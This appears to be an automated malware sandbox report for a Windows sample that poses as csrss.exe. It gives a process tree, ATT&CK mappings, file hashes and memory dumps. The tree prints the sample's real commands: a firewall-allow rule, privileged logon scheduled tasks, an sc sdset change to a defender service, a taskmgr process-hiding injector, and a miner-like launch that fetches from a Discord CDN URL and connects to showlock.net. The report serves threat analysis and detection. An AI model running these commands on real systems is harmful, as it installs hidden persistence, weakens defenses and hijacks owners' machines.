PID 1460 wrote to memory of 1312	1460	csrss.exe	96
PID 1460 wrote to memory of 2112	1460	csrss.exe	99
PID 1460 wrote to memory of 2112	1460	csrss.exe	99
PID 1460 wrote to memory of 2112	1460	csrss.exe	99
PID 1460 wrote to memory of 2628	1460	csrss.exe	101
PID 1460 wrote to memory of 2628	1460	csrss.exe	101
PID 4056 wrote to memory of 4008	4056	windefender.exe	108
PID 4056 wrote to memory of 4008	4056	windefender.exe	108
PID 4056 wrote to memory of 4008	4056	windefender.exe	108
PID 4008 wrote to memory of 1132	4008	cmd.exe	109
PID 4008 wrote to memory of 1132	4008	cmd.exe	109
PID 4008 wrote to memory of 1132	4008	cmd.exe	109
PID 1460 wrote to memory of 2640	1460	csrss.exe	111
PID 1460 wrote to memory of 2640	1460	csrss.exe	111
PID 1460 wrote to memory of 2640	1460	csrss.exe	111
PID 1460 wrote to memory of 2180	1460	csrss.exe	113
PID 1460 wrote to memory of 2180	1460	csrss.exe	113
PID 1460 wrote to memory of 2180	1460	csrss.exe	113
PID 1460 wrote to memory of 3948	1460	csrss.exe	115
PID 1460 wrote to memory of 3948	1460	csrss.exe	115
PID 1460 wrote to memory of 3948	1460	csrss.exe	115
PID 1460 wrote to memory of 676	1460	csrss.exe	117
PID 1460 wrote to memory of 676	1460	csrss.exe	117
PID 1460 wrote to memory of 676	1460	csrss.exe	117
PID 1460 wrote to memory of 2400	1460	csrss.exe	119
PID 1460 wrote to memory of 2400	1460	csrss.exe	119
PID 1460 wrote to memory of 2400	1460	csrss.exe	119
PID 1460 wrote to memory of 3872	1460	csrss.exe	121
PID 1460 wrote to memory of 3872	1460	csrss.exe	121
PID 1460 wrote to memory of 3872	1460	csrss.exe	121

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
"C:\Users\Admin\AppData\Local\Temp\6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4144
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -nologo -noprofile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1344
- C:\Users\Admin\AppData\Local\Temp\6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe
  "C:\Users\Admin\AppData\Local\Temp\6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63.exe"
  2⤵
  - Windows security bypass
  - Windows security modification
  - Adds Run key to start application
  - Checks for VirtualBox DLLs, possible anti-VM trick
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1384
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Drops file in System32 directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4108
- - C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1824
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:316
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Drops file in System32 directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:196
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Drops file in System32 directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2632
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Manipulates WinMonFS driver.
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1460
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Command and Scripting Interpreter: PowerShell
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4704
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:1812
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /delete /tn ScheduledUpdate /f
      4⤵
      PID:4584
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Command and Scripting Interpreter: PowerShell
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1312
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Command and Scripting Interpreter: PowerShell
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2112
  - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:2628
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:2904
  - - C:\Windows\windefender.exe
      "C:\Windows\windefender.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4056
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4008
      - C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:1132
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Command and Scripting Interpreter: PowerShell
      Modifies data under HKEY_USERS
      Suspicious use of AdjustPrivilegeToken
      PID:2640
  - - C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
      4⤵
      Executes dropped EXE
      PID:2180
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Command and Scripting Interpreter: PowerShell
      Modifies data under HKEY_USERS
      Suspicious use of AdjustPrivilegeToken
      PID:3948
  - - C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
      4⤵
      Executes dropped EXE
      Modifies data under HKEY_USERS
      PID:676
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Command and Scripting Interpreter: PowerShell
      Modifies data under HKEY_USERS
      Suspicious use of AdjustPrivilegeToken
      PID:2400
  - - C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
      4⤵
      Executes dropped EXE
      PID:3872

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bngfkj5h.a3y.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Filesize
2.0MB

MD5
1bf850b4d9587c1017a75a47680584c4

SHA1
75cd4738ffc07f203c3f3356bc946fdd0bcdbe19

SHA256
ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955

SHA512
ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

Filesize
2.8MB

MD5
713674d5e968cbe2102394be0b2bae6f

SHA1
90ac9bd8e61b2815feb3599494883526665cb81e

SHA256
f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057

SHA512
e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Filesize
2.0MB

MD5
dcb505dc2b9d8aac05f4ca0727f5eadb

SHA1
4f633edb62de05f3d7c241c8bc19c1e0be7ced75

SHA256
61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

SHA512
31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
225e22a107190ca6d7249dd3892caa8f

SHA1
e3160a6878ed63e4f6e91440948be6c217e880d7

SHA256
d0b11814995e7167a7d7ea905071bfff281c54e80fca20be2d81b133344599c1

SHA512
35aa5aa3a0d7086231e836c16e451e3955d8028f4298952305b8e3dc5719dd5e981d02a94f779e0f853900e016399b74af71beb23ee4c1d144e366a9697f3fdf

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
6bf45b0dd6689a89185c1d59ff6bcac3

SHA1
13e4ed019fb856b5f09e1498f01a39713b701e5f

SHA256
c6890d13c0536dda5acedb0da14c0c89aa8199597116449839b67e9b54bae5be

SHA512
479e44e13ca21ec017068e0fb1f65950f37b7053aa53df2f757ac6a9c8d3264a5bb4c45215c6180b052822744b5b11f2210a40ba290d6b4c492c51e36b46a448

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
9de8c47bc024f8788347c3ace55de5a9

SHA1
c99e9cf3f11ba3e4adfe4ca00a3e69f0b49deee9

SHA256
113761823c4f1ed8d22805ee8382f2ee9ea35d6e5596ee4549bdb326a361ae5d

SHA512
6fe5d64f4130b7a76dc311b420c8830bda02501e739c36daaba233895a4e78f7016f3fd405b010f648dadcd73cc500708a07901f9c1b1cdc41cadedc508f4c6b

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
911b9234474f86ac4287e4a4c7d7300c

SHA1
d60e23cd87330f58df9030b247ff07636cfdc222

SHA256
6970a778bdc3cde8ca89ed8c739b777f731ad60c14893be6429879e41c97f678

SHA512
2ff25aeb8e737f0cf115a97562f6b3287b6a73d699069fa4e22bde70dc1c33138231d18313f2dfc8e2a2d29d97a921199150afa7f667d6e3b98978dd25b25712

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
08fc3efece0989f379f34e60b78ac404

SHA1
6b5c095f9b2dc2ea4974f2143477d0355d0304b0

SHA256
ab88b4a1e56a9a51948a7d63587afa9c9b7faceabd2ca4d24a8f47e18252e83c

SHA512
68069fbf5c9be239021599ac21e4264bfb24e48f88d8c036df116931bd487f839f95e5b82cf608df5438ee5dc13fac57513c018506669cbc9baa30a5530f63ae

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
feef69ccf89efb4011966edcbaf5e017

SHA1
9a5bad12eb96997c2b8f02cfab6c04442dada25c

SHA256
0768af1af15cf62c63e3fe9a0d8b504b29a12b4811b4dc2d78dcf69cb063345f

SHA512
566135d646923dc80a18d3aa60bc764bb0dbc837bc98a76b12dfe5a874927c0b66eb0c40bf1567f97b35ba4f6ec14ba3900f88bbc6b67af3d7c835a17907e2c4

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
3b51bf0df20976144cc59e5aa4150185

SHA1
c03fed655405e96e750c7073f1a909b8a66a6a74

SHA256
4696f20cd7ff8068557a17f864835d400c72eb81f4970063640ddce15df9d1c2

SHA512
6a5643fb679b1dd9d6aaaf65da6ac21bcf7c51acaa5e76ecd24d2f5cd2f5e332eed595185dec2d6149bfd94ae3f2ba0a6aed78a0600243e38c2261bb3dec7604

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
e21598cc09e1bafffd57c200c37175b1

SHA1
65859bbdb9c5f43c793c1564018c4fb86ec560cf

SHA256
3a413e45dc4b3ffb9be6a4f6becf7bb6bf5317cd419a63914fe0df0281dedb34

SHA512
e8be12d1df94a9f6d547cb503f7470631f58763d96a63d940314a1edbf7e7fb5d017dc4223fe9a566a2e75b9bfa5649769e82a901900e239fb875d0dbdabcd44

Download Submit
C:\Windows\rss\csrss.exe

Filesize
4.1MB

MD5
73b97e529d31d81b465c624d51a3e42a

SHA1
c479c4d1d7eb4ed1261ac6b112e0ab62ed8ba341

SHA256
6e659645f5c1eb180474651212df7c03a69893df64421f83cdb2d1d917befe63

SHA512
0e68162ac6289d84045d848c08ee39b0bd9bddabed256fc6dd1373cf06241afc34ed58c963a34cc2f27eb362a2f228b37810fc7bba66758bae5e92523c8a1f54

Download Submit
C:\Windows\windefender.exe

Filesize
2.0MB

MD5
8e67f58837092385dcf01e8a2b4f5783

SHA1
012c49cfd8c5d06795a6f67ea2baf2a082cf8625

SHA256
166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

SHA512
40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

Download Submit
memory/196-565-0x0000000070960000-0x0000000070CB0000-memory.dmp

Filesize
3.3MB

Download
memory/196-564-0x0000000070910000-0x000000007095B000-memory.dmp

Filesize
300KB

Download
memory/676-2536-0x00000000012C0000-0x0000000001B8D000-memory.dmp

Filesize
8.8MB

Download
memory/676-2287-0x00000000012C0000-0x0000000001B8D000-memory.dmp

Filesize
8.8MB

Download
memory/676-2540-0x00000000012C0000-0x0000000001B8D000-memory.dmp

Filesize
8.8MB

Download
memory/676-2532-0x00000000012C0000-0x0000000001B8D000-memory.dmp

Filesize
8.8MB

Download
memory/1312-1285-0x00000000707C0000-0x000000007080B000-memory.dmp

Filesize
300KB

Download
memory/1312-1286-0x0000000070830000-0x0000000070B80000-memory.dmp

Filesize
3.3MB

Download
memory/1312-1264-0x00000000075B0000-0x0000000007900000-memory.dmp

Filesize
3.3MB

Download
memory/1312-1266-0x0000000007AD0000-0x0000000007B1B000-memory.dmp

Filesize
300KB

Download
memory/1312-1291-0x0000000009060000-0x0000000009105000-memory.dmp

Filesize
660KB

Download
memory/1344-35-0x0000000008310000-0x000000000834C000-memory.dmp

Filesize
240KB

Download
memory/1344-11-0x0000000006FB0000-0x0000000006FD2000-memory.dmp

Filesize
136KB

Download
memory/1344-7-0x0000000001100000-0x0000000001136000-memory.dmp

Filesize
216KB

Download
memory/1344-75-0x0000000070840000-0x0000000070B90000-memory.dmp

Filesize
3.3MB

Download
memory/1344-76-0x0000000009CD0000-0x0000000009CEE000-memory.dmp

Filesize
120KB

Download
memory/1344-81-0x0000000009D30000-0x0000000009DD5000-memory.dmp

Filesize
660KB

Download
memory/1344-73-0x0000000009CF0000-0x0000000009D23000-memory.dmp

Filesize
204KB

Download
memory/1344-66-0x0000000008EA0000-0x0000000008F16000-memory.dmp

Filesize
472KB

Download
memory/1344-9-0x0000000073AE0000-0x00000000741CE000-memory.dmp

Filesize
6.9MB

Download
memory/1344-16-0x0000000007F90000-0x0000000007FDB000-memory.dmp

Filesize
300KB

Download
memory/1344-15-0x0000000007D40000-0x0000000007D5C000-memory.dmp

Filesize
112KB

Download
memory/1344-74-0x00000000707F0000-0x000000007083B000-memory.dmp

Filesize
300KB

Download
memory/1344-6-0x0000000073AEE000-0x0000000073AEF000-memory.dmp

Filesize
4KB

Download
memory/1344-14-0x0000000007990000-0x0000000007CE0000-memory.dmp

Filesize
3.3MB

Download
memory/1344-12-0x0000000007050000-0x00000000070B6000-memory.dmp

Filesize
408KB

Download
memory/1344-13-0x0000000007820000-0x0000000007886000-memory.dmp

Filesize
408KB

Download
memory/1344-10-0x0000000073AE0000-0x00000000741CE000-memory.dmp

Filesize
6.9MB

Download
memory/1344-275-0x0000000009EB0000-0x0000000009ECA000-memory.dmp

Filesize
104KB

Download
memory/1344-82-0x0000000009F50000-0x0000000009FE4000-memory.dmp

Filesize
592KB

Download
memory/1344-8-0x0000000007110000-0x0000000007738000-memory.dmp

Filesize
6.2MB

Download
memory/1344-298-0x0000000073AE0000-0x00000000741CE000-memory.dmp

Filesize
6.9MB

Download
memory/1344-280-0x0000000009E90000-0x0000000009E98000-memory.dmp

Filesize
32KB

Download
memory/1384-1021-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1790-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1788-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1792-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1794-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1796-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-2043-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1770-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1786-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-2530-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1784-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1782-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1740-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-2534-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1780-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-2538-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1778-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1776-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1755-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1774-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1756-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1758-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1772-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1760-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1762-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1764-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1766-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/1460-1768-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/2112-1527-0x0000000070810000-0x0000000070B60000-memory.dmp

Filesize
3.3MB

Download
memory/2112-1526-0x00000000707C0000-0x000000007080B000-memory.dmp

Filesize
300KB

Download
memory/2112-1506-0x0000000007340000-0x0000000007690000-memory.dmp

Filesize
3.3MB

Download
memory/2180-2051-0x0000000000400000-0x00000000008E1000-memory.dmp

Filesize
4.9MB

Download
memory/2180-2045-0x0000000000400000-0x00000000008E1000-memory.dmp

Filesize
4.9MB

Download
memory/2400-2311-0x00000000706D0000-0x000000007071B000-memory.dmp

Filesize
300KB

Download
memory/2400-2312-0x0000000070740000-0x0000000070A90000-memory.dmp

Filesize
3.3MB

Download
memory/2400-2291-0x0000000007740000-0x0000000007A90000-memory.dmp

Filesize
3.3MB

Download
memory/2632-780-0x00000000080E0000-0x0000000008430000-memory.dmp

Filesize
3.3MB

Download
memory/2632-801-0x0000000070980000-0x0000000070CD0000-memory.dmp

Filesize
3.3MB

Download
memory/2632-800-0x0000000070910000-0x000000007095B000-memory.dmp

Filesize
300KB

Download
memory/2640-1802-0x0000000008450000-0x000000000849B000-memory.dmp

Filesize
300KB

Download
memory/2640-1827-0x0000000009460000-0x0000000009505000-memory.dmp

Filesize
660KB

Download
memory/2640-1822-0x0000000070720000-0x0000000070A70000-memory.dmp

Filesize
3.3MB

Download
memory/2640-1821-0x00000000706D0000-0x000000007071B000-memory.dmp

Filesize
300KB

Download
memory/2640-1801-0x0000000007AD0000-0x0000000007E20000-memory.dmp

Filesize
3.3MB

Download
memory/2724-1753-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/2724-1757-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/2724-1761-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/3872-2541-0x0000000000400000-0x00000000008E8000-memory.dmp

Filesize
4.9MB

Download
memory/3872-2537-0x0000000000400000-0x00000000008E8000-memory.dmp

Filesize
4.9MB

Download
memory/3872-2533-0x0000000000400000-0x00000000008E8000-memory.dmp

Filesize
4.9MB

Download
memory/3872-2528-0x0000000000400000-0x00000000008E8000-memory.dmp

Filesize
4.9MB

Download
memory/3948-2071-0x0000000070720000-0x0000000070A70000-memory.dmp

Filesize
3.3MB

Download
memory/3948-2070-0x00000000706D0000-0x000000007071B000-memory.dmp

Filesize
300KB

Download
memory/4056-1754-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/4056-1750-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/4108-306-0x00000000083D0000-0x0000000008720000-memory.dmp

Filesize
3.3MB

Download
memory/4108-332-0x0000000009D50000-0x0000000009DF5000-memory.dmp

Filesize
660KB

Download
memory/4108-326-0x0000000070910000-0x000000007095B000-memory.dmp

Filesize
300KB

Download
memory/4108-327-0x0000000070960000-0x0000000070CB0000-memory.dmp

Filesize
3.3MB

Download
memory/4108-307-0x0000000008D40000-0x0000000008D8B000-memory.dmp

Filesize
300KB

Download
memory/4144-301-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/4144-2-0x0000000004950000-0x000000000523B000-memory.dmp

Filesize
8.9MB

Download
memory/4144-300-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/4144-302-0x0000000004950000-0x000000000523B000-memory.dmp

Filesize
8.9MB

Download
memory/4144-299-0x0000000000400000-0x0000000002959000-memory.dmp

Filesize
37.3MB

Download
memory/4144-1-0x0000000004540000-0x0000000004944000-memory.dmp

Filesize
4.0MB

Download
memory/4144-3-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/4704-1053-0x0000000008F70000-0x0000000009015000-memory.dmp

Filesize
660KB

Download
memory/4704-1048-0x00000000708C0000-0x0000000070C10000-memory.dmp

Filesize
3.3MB

Download
memory/4704-1026-0x0000000007610000-0x0000000007960000-memory.dmp

Filesize
3.3MB

Download
memory/4704-1047-0x0000000070870000-0x00000000708BB000-memory.dmp

Filesize
300KB

Download
memory/4704-1028-0x0000000007F10000-0x0000000007F5B000-memory.dmp

Filesize
300KB

Download